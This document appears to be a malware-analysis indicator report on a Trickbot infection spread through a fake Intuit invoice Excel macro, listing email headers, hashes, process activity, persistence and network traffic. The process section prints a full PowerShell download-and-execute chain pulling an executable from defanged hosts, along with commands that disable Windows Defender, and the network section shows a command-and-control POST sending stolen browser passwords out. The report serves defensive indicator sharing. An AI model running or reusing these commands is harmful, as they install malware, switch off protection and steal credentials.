#IOC #OptiData #VR #Trickbot #X97M #macro
https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/

email_headers
--------------
Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
    by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
    for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
    (envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
    Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
Subject: FW: Invoice #3989021
From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>

files
--------------
SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
File name Invoice3989021.xls
File size 56.5 KB
SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
File name Client dll for Pim Index Maintenance
File size 361 KB
h11p: \eaucardinal{.} com/perfo.rmance
h11p: \abogadodetexas{.} com/perfo.rmance

activity
-------------

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
cmd /c ""C:\tmp\parser.bat" "
powershell "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
"C:\tmp\very.exe"
C:\Windows\SysWOW64\cmd.exe
sc stop WinDefend
sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
sc stop WinDefend
sc delete WinDefend
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
svchost.exe
svchost.exe
:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
C:\Windows\SysWOW64\cmd.exe
/c sc stop WinDefend
sc delete WinDefend
C:\Windows\SysWOW64\cmd.exe
/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe

persist
--------------
\Msntcs Client dll for Pim Index Maintenance
Client dll for Pim Index Maintenance
c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16

netwrk
--------------
198.50.100.170 eaucardinal{.} com GET /perfo.rmance HTTP/1.1 301
198.50.100.170 www.eaucardinal{.} com GET /perfo.rmance HTTP/1.1 404
23.229.233.135 abogadodetexas{.} com GET /perfo.rmance HTTP/1.1 200 !This program cannot be run in DOS mode.
52.1.46.34 checkip.amazonaws.com GET / HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 200 Public IP
138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;

POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 138.34.45.133
-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="data"
http://www.i.ua|oper|********(saved passwd)
https://www.ukr.net|11oper|********(saved passwd)
https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)
-----------NZYIBXEQQVBQBMZW
Content-Disposition: form-data; name="source"
firefox passwords
-----------NZYIBXEQ

powershell.exe 2336 TCP 10.0.2.15 49693 198.50.100.170 80 ESTABLISHED
powershell.exe 2336 TCP 10.0.2.15 49694 198.50.100.170 80 ESTABLISHED
powershell.exe 2336 TCP 10.0.2.15 49695 23.229.233.135 80 ESTABLISHED
svchost.exe 2540 TCP 10.0.2.15 49696 216.239.32.21 80 ESTABLISHED
svchost.exe 2540 TCP 10.0.2.15 49697 216.239.32.21 443 ESTABLISHED
svchost.exe 2540 TCP 10.0.2.15 49698 107.181.174.176 443 SYN_SENT
svchost.exe 2540 TCP apm11 49696 any-in-2015.1e100.net http ESTABLISHED
svchost.exe 2540 TCP apm11 49697 any-in-2015.1e100.net https ESTABLISHED
svchost.exe 2540 TCP apm11 49699 vds5605.example.com https SYN_SENT

# # #
https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9